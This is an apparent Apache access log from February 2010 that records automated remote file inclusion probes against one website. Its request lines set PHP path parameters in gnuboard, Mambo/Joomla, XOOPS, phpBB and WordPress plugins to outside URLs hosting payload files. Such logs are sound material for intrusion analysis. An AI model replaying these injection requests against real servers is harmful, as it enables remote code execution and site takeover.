220.80.108.81 - - [15/Feb/2010:07:47:37 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:07:47:37 -0800] "GET /write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:07:47:37 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:48:13 -0800] "GET /logs/access_100126.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:48:22 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:48:22 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [15/Feb/2010:07:50:12 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [15/Feb/2010:07:50:12 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [15/Feb/2010:07:50:14 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [15/Feb/2010:07:50:19 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:50:27 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:50:27 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:50:27 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:50:45 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:50:52 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:50:52 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:50:52 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:53:39 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:07:53:46 -0800] "GET /logs/access_100125.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:07:53:52 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:07:53:53 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:07:54:48 -0800] "GET /index.php?body=http://ebaroque.co.kr/page/1??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:07:54:49 -0800] "GET /logs/index.php?body=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:07:54:54 -0800] "GET /logs/access_100111.log/index.php?body=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:07:55:07 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:07:55:07 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:07:55:07 -0800] "GET /bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:07:55:17 -0800] "GET /logs/access_100115.log/index.php?body=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:07:56:21 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:07:56:21 -0800] "GET /bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:07:56:21 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:07:56:50 -0800] "GET /bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:07:56:50 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:07:56:50 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:58:44 -0800] "GET /logs/access_100129.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:58:44 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:58:44 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:58:48 -0800] "GET /logs/access.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:12 -0800] "GET /logs/access_100129.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:12 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:12 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:12 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:21 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:21 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:22 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:23 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:23 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:23 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:59:24 -0800] "GET /logs/access_100210.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:59:28 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:29 -0800] "GET /logs/access_100105.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:29 -0800] "GET /logs/access_100129.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:29 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:29 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:59:34 -0800] "GET /logs/access_100210.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:59:35 -0800] "GET /logs/access.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:59:39 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:41 -0800] "GET /logs/access_100105.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:46 -0800] "GET /logs/access_100203.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:46 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:46 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:46 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:53 -0800] "GET /logs/access_100203.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:53 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:53 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:07:59:53 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:08:00:32 -0800] "GET /logs/access_100129.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:08:00:32 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:08:00:32 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:08:00:32 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:00:38 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:00:38 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:00:38 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:00:40 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:00:40 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:00:40 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:08:00:49 -0800] "GET /logs/access_100129.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:08:00:49 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:08:00:50 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:01:02 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:01:06 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:08:01:25 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:08:01:25 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:01:44 -0800] "GET /logs/access_100205.log%20%20//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:01:45 -0800] "GET /modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:01:51 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:01:51 -0800] "GET /modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:01:51 -0800] "GET /logs/access_100205.log%20%20//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:03 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:03 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:03 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:03 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:05 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:05 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:05 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:05 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:02:10 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:15 -0800] "GET /logs/access_100129.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:02:15 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:15 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:15 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:15 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:02:16 -0800] "GET /logs/access_100117.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:02:16 -0800] "GET /logs/access_100129.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:02:16 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:02:17 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:02:18 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:02:20 -0800] "GET /logs/access_100129.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:02:20 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:02:21 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:31 -0800] "GET /logs/access_100129.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:32 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:32 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:02:32 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:02:50 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
